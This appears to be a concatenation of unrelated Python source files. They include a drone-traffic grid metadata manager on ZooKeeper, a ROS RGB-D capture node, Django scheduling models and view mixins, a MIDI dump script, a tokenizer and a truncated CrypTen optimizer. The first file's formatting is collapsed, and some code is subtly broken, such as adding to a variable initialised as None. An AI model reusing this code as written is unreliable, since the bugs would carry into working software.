"""Sets the metadata for a GridCell by removing the entry for the USS. Args: z: zoom level in slippy tile format x: x tile number in slippy tile format y: y tile number in slippy tile format uss_id: is the plain text identifier for the USS Returns: JSend formatted response (https://labs.omniti.com/labs/jsend) """ status = 500 if slippy_util.validate_slippy(z, x, y): # first we have to get the cell (content, metadata) = self._get_raw(z, x, y) if metadata: try: m = uss_metadata.USSMetadata(content) m.remove_operator(uss_id) # TODO(pelletierb): Automatically retry on delete status = self._set_raw(z, x, y, m, metadata.version) except ValueError: status = 424 else: status = 404 else: status = 400 if status == 200: # Success, now get the metadata back to send back (content, metadata) = self._get_raw(z, x, y) result = { 'status': 'success', 'sync_token': metadata.last_modified_transaction_id, 'data': m.to_json() } else: result = self._format_status_code_to_jsend(status) return result def get_multi(self, z, grids): """Gets the metadata and snapshot token for multiple GridCells. Reads data from zookeeper, including a composite snapshot token. 
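    The composite token is order-independent because _hash_sync_tokens() sorts the per-cell
    tokens before hashing them into a single value. A typical client flow (arguments
    abbreviated, names illustrative):

        cells = manager.get_multi(z, [(x1, y1), (x2, y2)])
        token = cells['sync_token']
        manager.set_multi(z, [(x1, y1), (x2, y2)], token, uss_id, ...)  # rejected with 409
                                                                        # if any cell changed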
The snapshot token is used as a reference when writing to ensure the data has not been updated between read and write. Args: z: zoom level in slippy tile format grids: list of (x,y) tiles to retrieve Returns: JSend formatted response (https://labs.omniti.com/labs/jsend) """ try: combined_meta, syncs = self._get_multi_raw(z, grids) log.debug('Found sync token %s for %d grids...', self._hash_sync_tokens(syncs), len(syncs)) result = { 'status': 'success', 'sync_token': self._hash_sync_tokens(syncs), 'data': combined_meta.to_json() } except ValueError as e: result = self._format_status_code_to_jsend(400, e.message) except IndexError as e: result = self._format_status_code_to_jsend(404, e.message) return result def set_multi(self, z, grids, sync_token, uss_id, ws_scope, operation_format, operation_ws, earliest_operation, latest_operation): """Sets multiple GridCells metadata at once. Writes data, using the hashed snapshot token for confirming data has not been updated since it was last read. Args: z: zoom level in slippy tile format grids: list of (x,y) tiles to update sync_token: token retrieved in the original get_multi, uss_id: plain text identifier for the USS, ws_scope: scope to use to obtain OAuth token, operation_format: output format for operation ws (i.e. NASA, GUTMA), operation_ws: submitting USS endpoint where all flights in this cell can be retrieved from, earliest_operation: lower bound of active or planned flight timestamp, used for quick filtering conflicts. latest_operation: upper bound of active or planned flight timestamp, used for quick filtering conflicts. Returns: JSend formatted response (https://labs.omniti.com/labs/jsend) """ log.debug('Setting multiple grid metadata for %s...', uss_id) try: # first, get the affected grid's sync tokens m, syncs = self._get_multi_raw(z, grids) del m # Quick check of the token, another is done on the actual set to be sure # but this check fails early and fast log.debug('Found sync token %d for %d grids...', self._hash_sync_tokens(syncs), len(syncs)) if str(self._hash_sync_tokens(syncs)) == str(sync_token): log.debug('Composite sync_token matches, continuing...') self._set_multi_raw(z, grids, syncs, uss_id, ws_scope, operation_format, operation_ws, earliest_operation, latest_operation) log.debug('Completed updating multiple grids...') else: raise KeyError('Composite sync_token has changed') combined_meta, new_syncs = self._get_multi_raw(z, grids) result = { 'status': 'success', 'sync_token': self._hash_sync_tokens(new_syncs), 'data': combined_meta.to_json() } except (KeyError, RolledBackError) as e: result = self._format_status_code_to_jsend(409, e.message) except ValueError as e: result = self._format_status_code_to_jsend(400, e.message) except IndexError as e: result = self._format_status_code_to_jsend(404, e.message) return result def delete_multi(self, z, grids, uss_id): """Sets multiple GridCells metadata by removing the entry for the USS. Removes the operator from multiple cells. Does not return 404 on not finding the USS in a cell, since this should be a remove all type function, as some cells might have the ussid and some might not. 
Args: z: zoom level in slippy tile format grids: list of (x,y) tiles to delete uss_id: is the plain text identifier for the USS Returns: JSend formatted response (https://labs.omniti.com/labs/jsend) """ log.debug('Deleting multiple grid metadata for %s...', uss_id) try: if not uss_id: raise ValueError('Invalid uss_id for deleting multi') for x, y in grids: if slippy_util.validate_slippy(z, x, y): (content, metadata) = self._get_raw(z, x, y) if metadata: m = uss_metadata.USSMetadata(content) m.remove_operator(uss_id) # TODO(pelletierb): Automatically retry on delete status = self._set_raw(z, x, y, m, metadata.version) else: raise ValueError('Invalid slippy grids for lookup') result = self.get_multi(z, grids) except ValueError as e: result = self._format_status_code_to_jsend(400, e.message) return result ###################################################################### ################ INTERNAL FUNCTIONS ######################### ###################################################################### def _get_raw(self, z, x, y): """Gets the raw content and metadata for a GridCell from zookeeper. Args: z: zoom level in slippy tile format x: x tile number in slippy tile format y: y tile number in slippy tile format Returns: content: USS metadata metadata: straight from zookeeper """ path = '%s/%s/%s/%s/%s' % (GRID_PATH, str(z), str(x), str(y), USS_METADATA_FILE) log.debug('Getting metadata from zookeeper@%s...', path) try: c, m = self.zk.get(path) except NoNodeError: self.zk.ensure_path(path) c, m = self.zk.get(path) if c: log.debug('Received raw content and metadata from zookeeper: %s', c) if m: log.debug('Received raw metadata from zookeeper: %s', m) return c, m def _set_raw(self, z, x, y, m, version): """Grabs the lock and updates the raw content for a GridCell in zookeeper. Args: z: zoom level in slippy tile format x: x tile number in slippy tile format y: y tile number in slippy tile format m: metadata object to write version: the metadata version verified from the sync_token match Returns: 200 for success, 409 for conflict, 408 for unable to get the lock """ path = '%s/%s/%s/%s/%s' % (GRID_PATH, str(z), str(x), str(y), USS_METADATA_FILE) try: log.debug('Setting metadata to %s...', str(m)) self.zk.set(path, json.dumps(m.to_json()), version) status = 200 except BadVersionError: log.error('Sync token updated before write for %s...', path) status = 409 return status def _get_multi_raw(self, z, grids): """Gets the raw content and metadata for multiple GridCells from zookeeper. 
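    Each cell's sync token is the znode's last-modified transaction id taken from the ZnodeStat
    that kazoo returns alongside the content, as in _get_raw() above:

        content, stat = self.zk.get(path)
        sync_token = stat.last_modified_transaction_id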
Args: z: zoom level in slippy tile format grids: list of (x,y) tiles to retrieve Returns: content: Combined USS metadata syncs: list of sync tokens in the same order as the grids Raises: IndexError: if it cannot find anything in zookeeper ValueError: if the grid data is not in the right format """ log.debug('Getting multiple grid metadata for %s...', str(grids)) combined_meta = None syncs = [] for x, y in grids: if slippy_util.validate_slippy(z, x, y): (content, metadata) = self._get_raw(z, x, y) if metadata: combined_meta += uss_metadata.USSMetadata(content) syncs.append(metadata.last_modified_transaction_id) else: raise IndexError('Unable to find metadata in platform') else: raise ValueError('Invalid slippy grids for lookup') if len(syncs) == 0: raise IndexError('Unable to find metadata in platform') return combined_meta, syncs def _set_multi_raw(self, z, grids, sync_tokens, uss_id, ws_scope, operation_format, operation_ws, earliest_operation, latest_operation): """Grabs the lock and updates the raw content for multiple GridCells Args: z: zoom level in slippy tile format grids: list of (x,y) tiles to retrieve sync_tokens: list of the sync tokens received during get operation uss_id: plain text identifier for the USS, ws_scope: scope to use to obtain OAuth token, operation_format: output format for operation ws (i.e. NASA, GUTMA), operation_ws: submitting USS endpoint where all flights in this cell can be retrieved from, earliest_operation: lower bound of active or planned flight timestamp, used for quick filtering conflicts. latest_operation: upper bound of active or planned flight timestamp, used for quick filtering conflicts. Raises: IndexError: if it cannot find anything in zookeeper ValueError: if the grid data is not in the right format """ log.debug('Setting multiple grid metadata for %s...', str(grids)) try: contents = [] for i in range(len(grids)): # First, get and update them all in memory, validate the sync_token x = grids[i][0] y = grids[i][1] sync_token = sync_tokens[i] path = '%s/%s/%s/%s/%s' % (GRID_PATH, str(z), str(x), str(y), USS_METADATA_FILE) (content, metadata) = self._get_raw(z, x, y) if str(metadata.last_modified_transaction_id) == str(sync_token): log.debug('Sync_token matches for %d, %d...', x, y) m = uss_metadata.USSMetadata(content) if not m.upsert_operator(uss_id, ws_scope, operation_format, operation_ws, earliest_operation, latest_operation, z, x, y): raise ValueError('Failed to set operator content') contents.append((path, m, metadata.version)) else: log.error( 'Sync token from USS (%s) does not match token from zk (%s)...', str(sync_token), str(metadata.last_modified_transaction_id)) raise KeyError('Composite sync_token has changed') # Now, start a transaction to update them all # the version will catch any changes and roll back any attempted # updates to the grids log.debug('Starting transaction to write all grids at once...') t = self.zk.transaction() for path, m, version in contents: t.set_data(path, json.dumps(m.to_json()), version) log.debug('Committing transaction...') results = t.commit() if isinstance(results[0], RolledBackError): raise KeyError('Rolled back multi-grid transaction due to grid change') log.debug('Committed transaction successfully.') except (KeyError, ValueError, IndexError) as e: log.error('Error caught in set_multi_raw %s.', e.message) raise e def _format_status_code_to_jsend(self, status, message=None): """Formats a response based on HTTP status code. 
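    For example, a sync-token conflict (409) is formatted as:

        {'status': 'fail', 'code': 409,
         'message': 'Content in metadata has been updated since provided sync token.'}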
Args: status: HTTP status code message: optional message to override preset message for codes Returns: JSend formatted response (https://labs.omniti.com/labs/jsend) """ if status == 200 or status == 204: result = {'status': 'success', 'code': 204, 'message': 'Empty data set.'} elif status == 400: result = { 'status': 'fail', 'code': status, 'message': 'Parameters are not following the correct format.' } elif status == 404: result = { 'status': 'fail', 'code': status, 'message': 'Unable to pull metadata from lock system.' } elif status == 408: result = { 'status': 'fail', 'code': status, 'message': 'Timeout trying to get lock.' } elif status == 409: result = { 'status': 'fail', 'code': status, 'message': 'Content in metadata has been updated since provided sync token.' } elif status == 424: result = { 'status': 'fail', 'code': status, 'message': 'Content in metadata is not following JSON format guidelines.' } else: result = { 'status': 'fail', 'code': status, 'message': 'Unknown error code occurred.' } if message: result['message'] = message return result @staticmethod def _hash_sync_tokens(syncs): """Hashes a list of sync tokens into a single, positive 64-bit int. For various languages, the limit to integers may be different, therefore we truncate to ensure the hash is the same on all implementations. """ return abs(hash(tuple(sorted(syncs)))) % MAX_SAFE_INTEGER qed-uber/ubertool import csv import sqlite3 con = sqlite3.connect(":memory:") cur = con.cursor() cur.execute("CREATE TABLE t (col1, col2);") with open('agdrift_database.csv','rb') as fin: # csv.DictReader uses first line in file for column headings by default dr = csv.DictReader(fin) # comma is default delimiter to_db = [(i['col1'], i['col2']) for i in dr] cur.executemany("INSERT INTO t (col1, col2) VALUES (?, ?);", to_db) con.commit()#!/usr/bin/env python import numpy as np import cv2 import torch import os from time import time from scipy import interpolate import rospy from cv_bridge import CvBridge, CvBridgeError from sensor_msgs.msg import Image, CameraInfo import message_filters import tf2_ros from ros_numpy import msgify, numpify import rospkg def interpolate_missing_pixels( image: np.ndarray, mask: np.ndarray, method: str = 'nearest', fill_value: int = 0 ): """ :param image: a 2D image :param mask: a 2D boolean image, True indicates missing values :param method: interpolation method, one of 'nearest', 'linear', 'cubic'. :param fill_value: which value to use for filling up data outside the convex hull of known pixel values. Default is 0, Has no effect for 'nearest'. 
    :return: the image with missing values interpolated
    """
    h, w = image.shape[:2]
    xx, yy = np.meshgrid(np.arange(w), np.arange(h))

    known_x = xx[~mask]
    known_y = yy[~mask]
    known_v = image[~mask]

    missing_x = xx[mask]
    missing_y = yy[mask]

    interp_values = interpolate.griddata(
        (known_x, known_y), known_v, (missing_x, missing_y),
        method=method, fill_value=fill_value
    )

    interp_image = image.copy()
    interp_image[missing_y, missing_x] = interp_values

    return interp_image


class Processor:
    def __init__(self, height: int = 240, width: int = 320):
        self.bridge = CvBridge()
        self.tf = tf2_ros.Buffer()
        self.tf_sub = tf2_ros.TransformListener(self.tf)
        self.world_frame = 'subt'
        self.camera_frame = 'X1_ground_truth'  # 'X1/base_link/front_realsense_optical'
        self.folder_name = 'explorer_x1_rgbd_traj/living_room_traj1_frei_png'
        self.rgb_path = os.path.join(rospkg.RosPack().get_path('gradslam_ros'), f'data/{self.folder_name}/rgb/')
        self.depth_path = os.path.join(rospkg.RosPack().get_path('gradslam_ros'), f'data/{self.folder_name}/depth/')
        self.caminfo_path = os.path.join(rospkg.RosPack().get_path('gradslam_ros'), f'data/{self.folder_name}/caminfo/')
        self.tfs_path = os.path.join(rospkg.RosPack().get_path('gradslam_ros'), f'data/{self.folder_name}/livingRoom1n.gt.sim')
        self.assocs_path = os.path.join(rospkg.RosPack().get_path('gradslam_ros'), f'data/{self.folder_name}/associations.txt')
        self.image_n = 0
        self.save_data = rospy.get_param('~save_data', True)
        self.width, self.height = width, height
        if not os.path.isdir(os.path.join(rospkg.RosPack().get_path('gradslam_ros'), f'data/{self.folder_name}')):
            os.makedirs(self.rgb_path)
            os.makedirs(self.depth_path)
            os.makedirs(self.caminfo_path)

        # Subscribe to topics
        info_sub = message_filters.Subscriber('/X1/front_rgbd/optical/camera_info', CameraInfo)
        rgb_sub = message_filters.Subscriber('/X1/front_rgbd/optical/image_raw', Image)
        depth_sub = message_filters.Subscriber('/X1/front_rgbd/depth/optical/image_raw', Image)

        # Synchronize the topics by time
        ats = message_filters.ApproximateTimeSynchronizer(
            [rgb_sub, depth_sub, info_sub], queue_size=5, slop=0.1)
        ats.registerCallback(self.callback)

    def callback(self, rgb_msg, depth_msg, caminfo_msg):
        t0 = time()
        try:
            tf = self.tf.lookup_transform(self.world_frame, self.camera_frame,
                                          rospy.Time.now(), rospy.Duration.from_sec(1.0))
            rospy.logdebug('Found transform in %.3f sec', time() - t0)
        except tf2_ros.TransformException as ex:
            rospy.logerr('Could not transform from world %s to camera %s: %s.',
                         self.world_frame, self.camera_frame, ex)
            return
        try:
            # get rgb image
            rgb_image = self.bridge.imgmsg_to_cv2(rgb_msg, rgb_msg.encoding)
            rgb_image = np.asarray(rgb_image, dtype=np.float32)
            rgb_image = cv2.resize(rgb_image, (self.width, self.height), interpolation=cv2.INTER_LINEAR)

            # get depth image
            depth_image = self.bridge.imgmsg_to_cv2(depth_msg, depth_msg.encoding)
            depth_image = np.asarray(depth_image, dtype=np.float32)
            depth_image = cv2.resize(depth_image, (self.width, self.height), interpolation=cv2.INTER_NEAREST)
            depth_image = interpolate_missing_pixels(depth_image,
                                                     mask=np.asarray(depth_image == np.inf),
                                                     method='nearest',
                                                     fill_value=10.0)
        except CvBridgeError as e:
            rospy.logerr(e)
            return

        # get pose
        T = numpify(tf.transform)
        # get intrinsics
        K = np.asarray(caminfo_msg.K, dtype=np.float32).reshape([3, 3])

        assert rgb_image.shape[:2] == depth_image.shape
        assert T.shape == (4, 4)

        if self.save_data:
            # write images
            np.save(self.rgb_path + str(self.image_n) + '.npy', rgb_image)
            cv2.imwrite(self.rgb_path + str(self.image_n) + '.png', rgb_image)
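            # Note (added for clarity): the depth handling that follows saves
            # a float32 .npy copy, then rescales the depth by 1000 and casts
            # it to uint16 before writing a 16-bit PNG. The 1000x factor
            # suggests metres -> millimetres, the common 16-bit depth-PNG
            # convention in TUM/ICL-NUIM style datasets (an assumption; the
            # scale is not documented in this script). A read-back sketch
            # under that assumption:
            #   d16 = cv2.imread(depth_png_path, cv2.IMREAD_UNCHANGED)  # uint16, mm ('depth_png_path' is a hypothetical variable)
            #   depth_m = d16.astype(np.float32) / 1000.0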
np.save(self.depth_path + str(self.image_n)+'.npy', depth_image) depth_image = 1000. * depth_image depth_image = depth_image.astype(np.uint16) cv2.imwrite(self.depth_path + str(self.image_n) + '.png', depth_image) # write intrinsics np.save(self.caminfo_path + str(self.image_n) + '.npy', K) # write associations with open(self.assocs_path, 'a') as f: f.write(str(self.image_n)+' depth/'+str(self.image_n)+'.png '+str(self.image_n)+' rgb/'+str(self.image_n)+'.png') f.write('\n') # write transformations with open(self.tfs_path, 'a') as f: for line in np.matrix(T[:3, :]): np.savetxt(f, line, fmt='%.2f') f.write('\n') self.image_n += 1 rospy.loginfo('Writing took: %.3f sec', time() - t0) if __name__ == '__main__': rospy.init_node('bag2data', log_level=rospy.DEBUG) ip = Processor() try: rospy.spin() except KeyboardInterrupt: print("Shutting down") import copy from congregation.dag.nodes.node import OpNode from congregation.datasets.relation import Relation from congregation.utils import * class NaryOpNode(OpNode): def __init__(self, name: str, out_rel: Relation, parents: set): super(NaryOpNode, self).__init__(name, out_rel) self.parents = parents class Concat(NaryOpNode): def __init__(self, out_rel: Relation, parents: list): self.check_parents(parents) super(Concat, self).__init__("concat", out_rel, set(parents)) self.ordered = parents @staticmethod def check_parents(parents: list): if len(set(parents)) != len(parents): raise Exception("Parents list passed to Concat() node has duplicates.") def is_reversible(self): return True def get_in_rels(self): return [parent.out_rel for parent in self.ordered] def replace_parent(self, old_parent: OpNode, new_parent: OpNode): super(Concat, self).replace_parent(old_parent, new_parent) idx = self.ordered.index(old_parent) self.ordered[idx] = new_parent def remove_parent(self, parent: OpNode): super(Concat, self).remove_parent(parent) idx = self.ordered.index(parent) del self.ordered[idx] def update_out_rel_cols(self): all_in_rels = self.get_in_rels() in_cols_copy = copy.deepcopy(all_in_rels[0].columns) all_trust_sets = resolve_trust_sets_from_rels(all_in_rels) all_plaintext_sets = resolve_plaintext_sets_from_rels(all_in_rels) for (i, c) in enumerate(in_cols_copy): c.trust_with = all_trust_sets[i] c.plaintext = all_plaintext_sets[i] self.out_rel.columns = in_cols_copy self.out_rel.update_columns() src/compas_hpc/linalg/linalg_cl.py from __future__ import absolute_import from __future__ import division from __future__ import print_function try: from numpy import diag from numpy import eye from numpy import float32 except: pass try: from compas.hpc import give_cl except: pass try: import pyopencl as cl except: pass __all__ = [ 'diag_cl', 'transpose_cl', 'eye_cl', ] def transpose_cl(a): """ Return the transpose of a GPUArray. Parameters ---------- a : GPUArray Array on GPU memory. Returns ------- gpuarray Tranpose of the input GPUArray. """ return a.transpose() def diag_cl(queue, a): """ Construct GPUArray diagonal. Parameters ---------- queue PyOpenCL queue. a : array, list Elements along diagonal. Returns ------- gpuarray GPUArray with inserted diagonal. """ return give_cl(queue, diag(a)) def eye_cl(queue, n): """ Create GPUArray identity matrix (ones on diagonal) of size (n x n). Parameters ---------- queue PyOpenCL queue. n : int Size of identity matrix (n x n). Returns ------- gpuarray Identity matrix (n x n) as GPUArray. 
""" return give_cl(queue, eye(n, dtype=float32)) # ============================================================================== # Main # ============================================================================== if __name__ == "__main__": from compas.hpc import get_cl ctx = cl.create_some_context() queue = cl.CommandQueue(ctx) a_ = give_cl(queue, [[0, 1, 2]]) print(get_cl(diag_cl(queue, [0, 1, 2]))) print(get_cl(eye_cl(queue, 3))) print(get_cl(transpose_cl(a_))) from django.views.generic import CreateView from django.views.generic import DeleteView from django.views.generic import DetailView from django.views.generic import ListView from django.views.generic import UpdateView from model_controller.mixins import ExtendedLoginRequiredMixin class CreateViewMixin(ExtendedLoginRequiredMixin, CreateView): """ This view mixin work together with CreateForm. CreateForm need require request to get current login user. """ def get_form_kwargs(self): kwargs = super(CreateViewMixin, self).get_form_kwargs() kwargs["request"] = self.request return kwargs class UpdateViewMixin(ExtendedLoginRequiredMixin, UpdateView): def get_form_kwargs(self): kwargs = super(UpdateViewMixin, self).get_form_kwargs() kwargs["request"] = self.request return kwargs class ListViewMixin(ExtendedLoginRequiredMixin, ListView): pass class DetailViewMixin(ExtendedLoginRequiredMixin, DetailView): pass class DeleteViewMixin(ExtendedLoginRequiredMixin, DeleteView): pass #!/usr/bin/env python3 """ Example usage: mididump """ import argparse import signal import time import threading import mxmidi from mxmidi import MidiEvent # Should be imported BEFORE starting threads? # TODO: is it true? try: import IPython if int(IPython.__version__.split('.')[0]) >= 5: ipython_kwargs = dict(banner1='', confirm_exit=False) else: from traitlets.config.loader import Config cfg = Config() cfg.TerminalInteractiveShell.confirm_exit = False prompt_config = cfg.PromptManager prompt_config.in_template = 'In <\\#>: ' prompt_config.in2_template = ' .\\D.: ' prompt_config.out_template = 'Out<\\#>: ' ipython_kwargs = dict(config=cfg, banner1='') except ImportError: pass parser = argparse.ArgumentParser( description='Dump incoming MIDI events to stdout.' 
)
parser.add_argument('-n', '--client-name', type=str, dest='client_name',
                    default='mididump', help='ALSA sequencer client name')
parser.add_argument('-p', '--port-name', type=str, dest='port_name',
                    default='out_0', help='ALSA sequencer port name')
args = parser.parse_args()


def handler(signum, frame):
    print('\nTerminating on signal ', signum)
    exit(0)
    #raise KeyboardInterrupt
    #print('Ctrl+Z pressed, but ignored')


signal.signal(signal.SIGTSTP, handler)  # Ctrl+Z
signal.signal(signal.SIGINT, handler)   # Ctrl+C

try:
    IPython.embed(**ipython_kwargs)
except:
    pass

try:
    mxmidi.open(args.client_name, args.port_name)
    mxmidi.connect('mxmd:0')
except mxmidi.AlsaSequencerError as e:
    print(str(e))
    exit(1)


def thread_beat():
    while True:
        mxmidi.send(9, 'note', 36, 32)
        time.sleep(2)
        mxmidi.send(9, 'note', 36, 0)


t = threading.Thread(target=thread_beat)
t.start()

'''
def wait_loop():
    while True:
        data = mxmidi.wait_for_event()
        print('Event: ', data)
'''


def event_handler(*args, **kwargs):
    print('args: ', args, 'kwargs: ', kwargs)
    if args[1] == 'cc' and args[2] == 123:  # Panic CC
        raise KeyboardInterrupt
    return True


mxmidi.set_event_handler(event_handler)
mxmidi.listen()

while True:
    pass

pos_ngrams/preprocessing/tokenizer.py
#!/usr/bin/env python
"""Functions for tokenizing data, the below can be updated to account for
new lines without spaces, or contiguous non-English languages"""
import shlex
from nltk.tokenize import sent_tokenize

__author__ = ""
__python_version__ = "3.6"


def tokenizer_word(text_string, keep_phrases=False):
    """
    Tokenizer that tokenizes a string of text on spaces and new lines
    (regardless of how many of each).

    :param text_string: Python string object to be tokenized.
    :param keep_phrases: Boolean, will not split "quoted" text
    :return: Array of strings, each is a word
    """
    text_string = str(text_string)
    if keep_phrases:
        tokens = shlex.split(text_string.replace('\n', ' ').replace('/', ' '))
    else:
        tokens = text_string.replace('\n', ' ').replace('/', ' ').split()
    return tokens


def tokenizer_sentence(text_string):
    """
    Tokenizer that tokenizes a string of text into sentences

    :param text_string: Python string object to be tokenized.
:return: Array of strings, each is a sentence """ sent_tokenize_list = sent_tokenize(text_string) return sent_tokenize_list def tokenizer_pos(pos_tuplets): """ Tokenizer that tokenizes a list of part of speech tuplets into array of tokens for each word, and an array for each tag :param pos_tuplets: List of pos tuplets :return: tokens, list of word tokens; tokens_tags, list of pos tags """ tokens = [] tokens_tags = [] for tup in pos_tuplets: tokens.append(tup[0]) tokens_tags.append(tup[1]) return tokens, tokens_tags def de_tokenizer_pos(tokens, tokens_tags, tokens_original): """ Rezips the 2 tokenized lists of the tokenizer_pos into a list of pos tuples :param tokens: List of str, word tokens :param tokens_tags: List of str, pos tags :param tokens_original: List of str, the original tokens as generated by tokenizer_pos :return: pos_tuplets, List of pos tuplets """ tokens = [x if x in tokens else None for x in tokens_original] pos_tuplets = [(x, y) for x, y in zip(tokens, tokens_tags) if x is not None] return pos_tuplets """Module for build/compile interception """ from .clang import build_main, compile_main __all__ = ['build_main', 'compile_main'] import calendar import datetime from django.db.models import Q, Sum from django.db.models.signals import post_save from django.dispatch import receiver from model_utils.models import SoftDeletableModel, TimeStampedModel from schedule.settings import MEDIA_URL from django.contrib.auth.models import User, Permission from django.db import models from django.utils.translation import ugettext_lazy as _ from django.utils.encoding import smart_str def get_path_avatar(instance, filename): return "upload/{0}/avatar/{1}".format(instance.id, smart_str(filename)) class Profession(TimeStampedModel, SoftDeletableModel): name = models.CharField(max_length=200) abbreviation = models.CharField(max_length=10) class Meta: verbose_name = _("Profession") verbose_name_plural = _("Professions") def __str__(self): return self.name class Profile(TimeStampedModel, SoftDeletableModel): user = models.OneToOneField(User, blank=True, null=True, on_delete=models.CASCADE) phone = models.CharField(max_length=15, blank=True, null=True) color = models.CharField(max_length=7, blank=True, null=True) admin = models.NullBooleanField() avatar = models.FileField(blank=True, null=True, upload_to=get_path_avatar) profession = models.ForeignKey(Profession, blank=True, null=True, on_delete=models.SET_NULL) class Meta: verbose_name = _("Profile") verbose_name_plural = _("Profiles") def __str__(self): if self.user and self.user.first_name: if self.profession: return self.profession.abbreviation + ' ' + self.user.first_name else: return self.user.first_name else: return str(self.id) def get_time_after_today(self,today): day = datetime.datetime.now().day last_day = calendar.monthrange(today.year,today.month)[1] hours_next = self.event_set.filter(date__month=today.month, date__year=today.year, date__day__lte=last_day, date__day__gte=day, is_removed=False).distinct().aggregate( Sum('duration_hours'),Sum('duration_minutes')) return hours_next def get_time_before_today(self, today): day = today.day hours_before = self.event_set.filter(date__month=today.month, date__year=today.year, date__day__lte=day, date__day__gte=1, is_removed=False).distinct().aggregate( Sum('duration_hours'),Sum('duration_minutes')) return hours_before def get_time_per_month(self, today): events_hours = self.event_set.filter(date__month=today.month, date__year=today.year, is_removed=False).distinct().aggregate( 
Sum('duration_hours'),Sum('duration_minutes')) return events_hours def get_time_after_today_per_turn(self,today): day = datetime.datetime.now().day last_day = calendar.monthrange(today.year,today.month)[1] hours_next = self.event_set.filter(date__month=today.month, date__year=today.year, date__day__lte=last_day, date__day__gte=day, is_removed=False).values('turn__name').annotate( Sum('duration_hours'),Sum('duration_minutes')) return hours_next def get_time_before_today_per_turn(self, today): day = today.day hours_before = self.event_set.filter(date__month=today.month, date__year=today.year, date__day__lte=day, date__day__gte=1, is_removed=False).values('turn__name').annotate( Sum('duration_hours'),Sum('duration_minutes')) return hours_before def get_time_per_month_per_turn(self, today): events_hours = self.event_set.filter(date__month=today.month, date__year=today.year, is_removed=False).values('turn__name').annotate( Sum('duration_hours'),Sum('duration_minutes')) return events_hours @property def get_avatar(self): if not self.avatar: return '/static/app/img/no_user.jpg' else: return MEDIA_URL + str(self.avatar) @receiver(post_save, sender=User) def create_user_profile(sender, instance, created, **kwargs): if created: profile = Profile.objects.create(user=instance) # can_dashboard = Permission.objects.get(codename='can_dashboard') # can_inbox = Permission.objects.get(codename='can_inbox') # profile.user.user_permissions.add(can_dashboard) # profile.user.user_permissions.add(can_inbox) class Hour(TimeStampedModel, SoftDeletableModel): start_time = models.TimeField() end_time = models.TimeField(blank=True, null=True) class Meta: verbose_name = _("Hour") verbose_name_plural = _("Hours") def __str__(self): return str(self.start_time) @property def as_dict(self): return { 'start_time': self.start_time, 'end_time': self.end_time } @property def get_amount_time(self): if self.end_time: end = datetime.timedelta(hours=self.end_time.hour, minutes=self.end_time.minute) start = datetime.timedelta(hours=self.start_time.hour, minutes=self.start_time.minute) return end - start else: return 0 class Turn(TimeStampedModel, SoftDeletableModel): name = models.CharField(max_length=100) # noche,tarde,manana hour = models.ForeignKey(Hour, blank=True, null=True, on_delete=models.SET_NULL) duration_hours = models.IntegerField(blank=True, null=True) duration_minutes = models.IntegerField(blank=True, null=True) class Meta: verbose_name = _("Turn") verbose_name_plural = _("Turns") ordering = ['hour__start_time'] def __str__(self): return self.name @property def get_amount_hours(self): return self.duration_hours @property def get_amount_minutes(self): return self.duration_minutes class Status(models.Model): name = models.CharField(max_length=100) # planificado,trabajado class Meta: verbose_name = _("Status") verbose_name_plural = _("Statuses") def __str__(self): return self.name class Event(TimeStampedModel, SoftDeletableModel): date = models.DateField() turn = models.ForeignKey(Turn, blank=True, null=True, on_delete=models.SET_NULL) status = models.ForeignKey(Status, on_delete=models.CASCADE, blank=True, null=True) # programed, plaint profile = models.ForeignKey(Profile, on_delete=models.CASCADE) duration_hours = models.IntegerField(blank=True, null=True) duration_minutes = models.IntegerField(blank=True, null=True) class Meta: verbose_name = _("Event") verbose_name_plural = _("Events") def __str__(self): return str(self.date_start) + ' ' + self.profile.user.first_name class Holiday(TimeStampedModel, 
SoftDeletableModel): day = models.DateField() class Meta: verbose_name = _("Holiday") verbose_name_plural = _("Holidays") def __str__(self): return str(self.day) class NonWorkingDay(TimeStampedModel, SoftDeletableModel): name = models.CharField(max_length=20) number_day = models.IntegerField() class Meta: verbose_name = _("NonWorkingDay") verbose_name_plural = _("NonWorkingDays") def __str__(self): return self.name class MotiveAffectation(models.Model): name = models.CharField(max_length=150) class Meta: verbose_name = _("MotiveAffectation") verbose_name_plural = _("MotiveAffectations") def __str__(self): return self.name class Affectation(TimeStampedModel, SoftDeletableModel): hour = models.ForeignKey(Hour, blank=True, null=True, on_delete=models.SET_NULL) motive = models.ForeignKey(MotiveAffectation, blank=True, null=True, on_delete=models.SET_NULL) comment = models.TextField(blank=True, null=True) class Feature(models.Model): menu_item_name = models.CharField(verbose_name=_('Item Name'), max_length=100) url = models.CharField(verbose_name=_('Url'), max_length=100) icon = models.CharField(verbose_name=_('Icon'), max_length=100) position = models.PositiveIntegerField(verbose_name=_('Position'), blank=True, null=True) child = models.ForeignKey('self', related_name='child_feature', on_delete=models.SET_NULL, blank=True, null=True) permission = models.ManyToManyField(Permission) class Meta: verbose_name = _("Feature") verbose_name_plural = _("Features") def __str__(self): return self.menu_item_name crypten/optim/optimizer.py #!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import crypten import torch from torch.optim.optimizer import required class Optimizer(torch.optim.Optimizer): r"""Base class for all optimizers. .. warning:: Parameters need to be specified as collections that have a deterministic ordering that is consistent between runs. Examples of objects that don't satisfy those properties are sets and iterators over values of dictionaries. Arguments: params (iterable): an iterable of :class:`torch.Tensor` s, :class:`dict` s, or :class:`crypten.CrypTensor`s. Specifies what Tensors should be optimized. defaults: (dict): a dict containing default values of optimization options (used when a parameter group doesn't specify them). Note: This optimizer is adapted from torch.optim.Optimizer to work with CrypTensors """ def add_param_group(self, param_group): r"""Add a param group to the :class:`Optimizer` s `param_groups`. This can be useful when fine tuning a pre-trained network as frozen layers can be made trainable and added to the :class:`Optimizer` as training progresses. Arguments: param_group (dict): Specifies what Tensors should be optimized along with group specific optimization options. """ assert isinstance(param_group, dict), "param group must be a dict" params = param_group["params"] if isinstance(params, (torch.Tensor, crypten.CrypTensor)): param_group["params"] = [params] elif isinstance(params, set): raise TypeError( "optimizer parameters need to be organized in ordered collections, but " "the ordering of tensors in sets will change between runs. Please use a list instead." 
